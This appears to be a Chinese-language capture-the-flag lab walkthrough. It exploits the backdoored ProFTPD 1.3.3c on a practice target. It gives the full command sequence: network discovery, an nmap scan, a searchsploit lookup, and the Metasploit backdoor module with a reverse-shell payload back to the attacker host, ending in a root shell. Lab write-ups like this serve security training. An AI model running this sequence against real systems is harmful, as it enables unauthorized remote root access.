首先进行靶机发现
netdiscover -r 靶机IP网段
发现靶机,对靶机进行操作系统版本扫描
nmap -sV 靶机IP
发现21端口版本号为 ProFTPD 1.3.3c
通过searchsploit查看对应版本号漏洞文件
searchsploit ProFTPD 1.3.3c
查看文件
cat /usr/share/exploitdb/exploits/linux/remote/15662.txt
很多情况下我们可以通过这些文件来判断如何去进行攻击,kail大多数都是把攻击方法写进文件,然后我们就可以通过读取文件信息来进行下一步。
(英语真的很重要)
进入msf
msf >
msf > search ProFTPD 1.3.3c
使用exploit/unix/ftp/proftpd_133c_backdoor 这个模块backdoor是后门的意思
使用并配置模块
msf > use exploit/unix/ftp/proftpd_133c_backdoor
msf exploit(unix/ftp/proftpd_133c_backdoor) >
查看payloads(有效载荷,有效负荷,有效载重)
msf exploit(unix/ftp/proftpd_133c_backdoor) > show payloads
msf exploit(unix/ftp/proftpd_133c_backdoor) > set payload cmd/unix/reverse
payload => cmd/unix/reverse
填写IP
msf exploit(unix/ftp/proftpd_133c_backdoor) > set rhost 靶机IP
rhost => 靶机IP
msf exploit(unix/ftp/proftpd_133c_backdoor) > set lhost kail的IP
lhost => kail的IP
运行
msf exploit(unix/ftp/proftpd_133c_backdoor) > exploit
id #查看当前用户权限
uid=0(root) gid=0(root) groups=0(root),65534(nogroup)
优化界面
python -c "import pty;pty.spawn('/bin/bash')"
root@vtcsec:/#
发现我们已经是root了,直接找flag吧。
如果不是root需要提权请看这个https://blog.csdn.net/weixin_45441727/article/details/114643796